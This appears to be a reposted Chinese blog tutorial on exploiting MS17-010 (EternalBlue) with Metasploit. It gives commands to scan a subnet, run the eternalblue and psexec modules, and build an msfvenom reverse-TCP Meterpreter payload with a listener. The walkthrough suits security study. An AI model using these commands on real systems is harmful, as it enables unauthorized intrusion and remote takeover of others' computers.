Metasploit-ms17-010永恒之蓝(X86使用)

最新推荐文章于 2024-07-14 17:22:12 发布
最新推荐文章于 2024-07-14 17:22:12 发布
阅读量5.4k 收藏 8
点赞数
分类专栏: 漏洞
原文链接:https://www.sqlsec.com/2018/03/smb.html
版权

Metasploit正题

搜索相关的漏洞插件

msf > search 17-010

 


搜索到了4个相关的插件:

 

  1. auxiliary/admin/smb/ms17_010_command
  2. auxiliary/scanner/smb/smb_ms17_010
  3. exploit/windows/smb/ms17_010_eternalblue
  4. exploit/windows/smb/ms17_010_psexec

其中前2个插件是auxiliary目录下的,属于辅助验证程序。
3和4是exploit目录下的,这才是我们重点研究的对象~

使用辅助验证插件测试

这里就拿auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试,这个插件的作用是扫描可能含有ms17-010漏洞的服务器。

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_ARCH  true             yes       Check for architecture on vulnerable hosts
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

这里的show options是显示这个插件相关的一些参数,在Required这一栏下面是yes的表示必填参数,这里面还剩RHOSTS这个参数没有填写即目标网段。下面设置一个目标网段,准备进行扫描测试:

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.55.1/24
RHOSTS => 10.10.55.1/24

设置扫描线程,插件默认是1,这里设置为50

msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50

可以执行show options查看自己刚刚填写的参数信息:


开始执行插件:

msf auxiliary(scanner/smb/smb_ms17_010) > run

或者

msf auxiliary(scanner/smb/smb_ms17_010) > exploit

可以看到扫描出很多含有漏洞的主机了:

 

使用exploit模块来进行攻击测试

exploit/windows/smb/ms17_010_eternalblue

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > run

exploit成功~~

 

exploit/windows/smb/ms17_010_psexec

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.55.174
RHOST => 10.10.55.174

msf exploit(windows/smb/ms17_010_psexec) > run

失败~~

msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.101.177.185:4444
[*] 10.10.55.174:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.10.55.174:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

黑客组织 Shadow Brokers 公布了美国国家安全局 NSA 的内部黑客工具和漏洞利用代码,包括三大工具 EternalChampion、EternalRomance 和 EternalSynergy,近日一位安全研究人员 Sean Dillon(RiskSense) 改良了这三大黑客工具的源代码,使其适用于 Windows 2000 之后 20 年间的所有微软操作系统,包括 32 位和 64 位版本。

这里我随便测试了没有成功,可能是这里我测试的win7版本有点不一样,和官方介绍的所有版本略微有点不一样~~不过在测试Server 08 R2版本的时候执行效率很高,可以很快拿到反弹的shell。所以具体改良了哪些建议实际动手去测试一番。

 

msf简单反弹shell模板

kali操作机器的ip地址是:10.101.177.185,将shell会话转到kali的6666端口上。

生成payload

payload生成有32位和64位,所以生成的时候得明确目标系统的位数,否则运行或者拿到会话的时候回GG,服务器那边弹出停止响应的运行框。

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.101.177.185 LPORT=6666 -f exe > shell.exe

 


然后把生成的shell.exe拷贝到Windows下面,准备运行~

32位payload的生成语句就是windows/meterpreter/reverse_tcp去掉x64

监听shell会话

msf > use exploit/multi/handler
msf > set LHOST 10.0.0.103
msf > set LPORT 6666
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

[*] Started reverse TCP handler on 10.101.177.185:6666

然后msf就开始监听本机的666的端口了。

 

运行shell.exe

这个时候在windows下点击之前生成的shell.exe,msf这里会劫持到会话。

 

32位系统,这里做如下调整:set PAYLOAD windows/meterpreter/reverse_tcp去掉x64

meterpreter汉字乱码问题

成因

Linux下面汉字默认是UTF-8编码
Windows下汉字使用的是GBK系列编码

解决方案

Kali下先勾选GBK编码


然后将终端临时设置为GBK系列编码即可。

 

效果对比

msf乱码

 

msf汉字正常

 

 

TYW----子曰小玖
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
Metasploitable渗透测试实战:ms17-010
weixin_68951704的博客
05-05 2912
漏洞简介: 永恒之蓝(即ms17-010)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 2271
msf永恒之蓝漏洞复现过程以及修复建议
Metasploit(一) 利用 MS17-010 漏洞进行攻击
buffedon的博客
06-03 5710
借助 metasploit 利用 MS17-010 漏洞进行攻击Metasploit 简介 (简称:MSF)经常被利用的端口MS17-010利用流程1. 存活判断2. 端口扫描3. 服务识别4. 系统识别5. 漏洞利用后渗透阶段基础命令POST后渗透模块访问文件系统权限提升获取密码的方式run windows/gather/credentials/windows_autologinhashdump 模块mimikatz程序加载kiwi模块MSF中的 mimikatz 模块 Metasploit 简介 (简称
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
最新发布
Time_worm的博客
07-14 642
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
metasploit-framework-6.3.34.zip
09-17
四、使用Metasploit的风险与道德规范 尽管Metasploit是强大的安全工具,但其潜在的破坏性也意味着必须谨慎使用。只有在合法授权的情况下,才能对目标系统进行渗透测试。非法使用可能会触犯法律,因此在使用前应确保...
Eternalblue-Doublepulsar-Metasploit-master
05-11
它主要利用了微软Windows操作系统的SMBv1(Server Message Block Version 1)服务中的MS17-010漏洞,允许攻击者远程执行代码,无需用户交互。该漏洞在2017年被 WannaCry 勒索软件大规模利用,导致全球范围内的计算机...
kali初讲——Metasploit攻击ms17_010复现
萌蠢骇客
06-14 1694
Kali初讲——ms17_010漏洞,永恒之蓝复现
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2492
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1428
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝漏洞利用(MS17-010
weixin_43526443的博客
08-19 1126
0x00永恒之蓝简介 永恒之蓝,一个梦幻般的名字,大概只要是搞安全的都应该认识该漏洞吧。这是一个非常经典的漏洞,同样也是一个危害极大的漏洞。在2017年,著名的勒索病毒在全球肆虐,令很多人闻风丧胆,其中黑阔们就是利用的ms17-010漏洞,预防的方式无非是打补丁(现在部分企业内仍存在此漏洞),下面贴上一张手册: 从图中可见,Windows XP、Windows 7、Windows server 2003、Windows server 2008、Windows server 2008 R2、W...
MS17-010 漏洞永恒之蓝445漏洞复现
qq_46400462的博客
05-01 1051
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 search MS17-010 查找MS17-010漏洞 2.使用anxiliary模块的scanner use 3 使用anxiliary模块的scanner扫描目标是否存在MS17-010漏洞 3.查看模块相关参数 show options 其中required为yes的为必要的参数 4.设置目标主机 .
MSF复现MS17-010漏洞(永恒之蓝
weixin_51151498的博客
02-07 545
ms17-010
使用ms17-010对win7进行渗透(传说中的永恒之蓝
热门推荐
xiaopan233的博客
09-21 4万+
本实验在虚拟机环境下进行! 准备虚拟机两台: Kali Win7 64位 (要将防火墙关闭) 先看看两台机器的ip地址是多少 kali的ip是 192.168.0.102 win7的ip是192.168.0.101 接着进行端口扫描 使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫...
永恒之蓝(ms17-010)&&meterpreter模块简单使用
Z_l123的博客
03-09 1383
永恒之蓝(ms17-010) 启动meterpreter msfconsole 查询ms17-010,并使用攻击模块 search ms17-010 use 3 设置目标ip,本机ip,payload set rhosts 192.168.254.130 set lhost 192.168.254.129 set payload windows/x64/meterpreter/reverse_tcp 查看配置 show options 开始攻击 run ...
ms17-010永恒之蓝) 漏洞复现与处理
06-06
对于 ms17-010永恒之蓝)漏洞的复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞。 2. 下载漏洞利用工具:可以使用 Metasploit 框架中的 exploit/windows/smb/ms17_010_eternalblue 模块进行漏洞利用。也可以使用其他的漏洞利用工具。 3. 进行漏洞利用:使用漏洞利用工具对目标系统进行攻击,获取目标系统的权限。 4. 处理漏洞:可以通过升级系统补丁或者关闭 SMB 服务来修复该漏洞。 总的来说,处理 ms17-010永恒之蓝)漏洞需要及时进行漏洞扫描和修复,以避免被黑客攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值